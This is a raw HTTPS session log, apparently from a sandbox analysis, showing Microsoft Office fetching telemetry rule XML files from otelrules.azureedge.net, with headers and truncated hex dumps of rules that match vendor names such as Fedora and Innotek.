                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                            x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120235Z-16547b76f7fkcrm9hC1DFWxdag0000000kng00000000cn7e
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            70192.168.2.44982813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:35 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                            x-ms-request-id: ec62ac56-d01e-002b-5482-3525fb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120235Z-1749fc9bdbdjznvchC1DFWx4dc000000029000000000cekd
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:35 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            71192.168.2.44982913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                            x-ms-request-id: a8f543db-f01e-003f-08a0-34d19d000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120236Z-r178fb8d765dbpv9hC1DFWma7000000000rg00000000bc73
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            72192.168.2.44983013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                            x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120236Z-16547b76f7f9rdn9hC1DFWfk7s0000000kg000000000d8qu
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            73192.168.2.44983113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                            x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120236Z-16547b76f7fcrtpchC1DFW52e80000000krg000000001tse
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            74192.168.2.44983213.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                            x-ms-request-id: f331b8e7-a01e-0070-470c-36573b000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120236Z-1749fc9bdbds4vwlhC1DFWz44000000002f0000000003wdg
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            75192.168.2.44983313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:36 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                            x-ms-request-id: 02e40e2a-001e-00a2-7a2b-36d4d5000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120236Z-16547b76f7fmbrhqhC1DFWkds80000000krg00000000226p
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            76192.168.2.44968413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                            x-ms-request-id: 5c60c0f5-901e-0067-06a2-34b5cb000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-1749fc9bdbdns7kfhC1DFWb6c400000002pg000000001fp7
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            77192.168.2.44968513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                            x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-16547b76f7fvllnfhC1DFWxkg80000000ks0000000000rgz
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            78192.168.2.44968613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:36 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:37 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                            x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120237Z-16547b76f7fm7xw6hC1DFW5px40000000kgg000000007cgz
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
